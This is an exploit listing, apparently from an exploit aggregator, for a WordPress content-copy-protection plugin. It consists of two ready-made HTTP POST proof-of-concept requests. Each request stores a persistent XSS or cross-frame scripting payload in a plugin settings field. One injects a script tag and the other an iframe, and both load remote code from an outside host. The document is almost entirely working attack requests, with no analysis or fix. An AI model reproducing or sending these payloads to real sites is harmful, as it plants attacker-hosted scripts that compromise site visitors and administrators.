Share
## https://sploitus.com/exploit?id=WPEX-ID:C722F8D0-F86B-41C2-9F1F-48E475E22864
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++